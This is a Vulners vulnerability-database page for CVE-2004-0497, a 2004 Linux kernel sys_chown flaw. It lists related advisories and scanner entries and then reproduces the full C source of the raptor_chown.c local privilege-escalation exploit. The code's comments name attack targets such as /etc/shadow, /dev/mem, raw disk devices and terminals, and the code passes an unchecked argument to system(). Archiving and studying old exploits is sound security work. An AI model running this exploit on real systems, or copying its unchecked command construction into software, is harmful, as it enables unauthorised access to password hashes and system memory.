Vulners
Lucene search
Linux Kernel 2.6.x < 2.6.7-rc3 - 'sys_chown()' Privilege Escalation
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | Linux Kernel 2.6.x < 2.6.7-rc3 - sys_chown() Privilege Escalation Exploit | 8 Nov 201600:00 | – | zdt |
| Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit | 24 Dec 200400:00 | – | zdt |
 | CVE-2004-0497 | 6 Jul 200404:00 | – | cve |
 | CVE-2004-0497 | 6 Jul 200404:00 | – | cvelist |
 | Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation | 24 Dec 200400:00 | – | exploitdb |
 | EUVD-2004-0496 | 7 Oct 202500:30 | – | euvd |
 | Linux Kernel 2.6.7-rc3 (Slackware 9.1 Debian 3.0) - sys_chown() Group Ownership Alteration Privilege Escalation | 24 Dec 200400:00 | – | exploitpack |
 | Fedora Core 2 : kernel-2.6.6-1.435.2.3 (2004-205) | 23 Jul 200400:00 | – | nessus |
| Fedora Core 1 : kernel-2.4.22-1.2197.nptl (2004-206) | 23 Jul 200400:00 | – | nessus |
| GLSA-200407-16 : Linux Kernel: Multiple DoS and permission vulnerabilities | 30 Aug 200400:00 | – | nessus |
10
/*
* $Id: raptor_chown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_chown.c - sys_chown missing DAC controls on Linux
* Copyright (c) 2004 Marco Ivaldi <[email protected]>
*
* Unknown vulnerability in Linux kernel 2.x may allow local users to
* modify the group ID of files, such as NFS exported files in kernel
* 2.4 (CAN-2004-0497).
*
* "Basically, you can change the group of a file you don't own, but not
* of an SGID executable." -- Solar Designer (0dd)
*
* On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you
* don't own, even on local filesystems. This may allow a local attacker to
* perform a privilege escalation, e.g. through the following attack vectors:
*
* 1) Target /etc/shadow: on some distros (namely slackware 9.1 and debian
* 3.0, probably others) the shadow group has read access to it.
* 2) Target /dev/mem, /dev/kmem: read arbitrary memory contents.
* 3) Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.
* 4) Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.
*
* Usage:
* $ gcc raptor_chown.c -o raptor_chown -Wall
* $ ./raptor_chown /etc/shadow
* [...]
* -rw-r----- 1 root users 500 Mar 25 12:27 /etc/shadow
*
* Vulnerable platforms:
* Linux 2.2.x (on nfs exported files, should be vuln) [untested]
* Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]
* Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]
*/
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#define INFO1 "raptor_chown.c - sys_chown missing DAC controls on Linux"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <[email protected]>"
int main(int argc, char **argv)
{
char cmd[256];
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s file_name\n\n", argv[0]);
exit(1);
}
/* ninpou: sys_chown no jutsu! */
if (chown(argv[1], -1, getgid()) < 0) {
switch(errno) {
case EPERM:
fprintf(stderr, "Error: Not vulnerable!\n");
break;
default:
perror("Error");
}
exit(1);
}
fprintf(stderr, "Ninpou: sys_chown no jutsu!\n");
/* print some output */
sprintf(cmd, "/bin/ls -l %s", argv[1]);
system(cmd);
exit(0);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Dec 2004 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 22.1
EPSS0.00306